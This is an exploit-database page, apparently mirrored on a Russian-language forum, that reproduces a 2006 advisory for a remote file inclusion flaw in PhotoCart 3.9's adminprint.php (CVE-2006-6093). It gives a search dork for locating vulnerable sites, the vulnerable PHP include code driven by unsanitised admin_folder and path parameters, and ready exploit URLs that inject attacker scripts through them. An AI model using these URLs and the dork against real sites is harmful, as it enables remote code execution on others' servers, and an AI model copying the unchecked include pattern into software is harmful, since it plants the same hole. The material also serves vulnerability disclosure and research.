- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2817
- Проверка EDB
-
- Пройдено
- Автор
- IRVIAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6093
- Дата публикации
- 2006-11-21
Код:
#####################################################################################################
#
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Script site: http://www.picturespro.com/store/programs/129-photo_cart.html
# Dork : inurl :/PhotoCart/
#
#####################################################################################################
##
##
## Bug Found By : irvian
##
##
####################################################################################################
###
### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
### Special greetz: #patihack #hitamputih #nyubicrew
###
#####################################################################################################
bug found on /PhotoCart/adminprint.php
include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
adminsessionCheck();
Expl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]
# milw0rm.com [2006-11-21]
- Источник
- www.exploit-db.com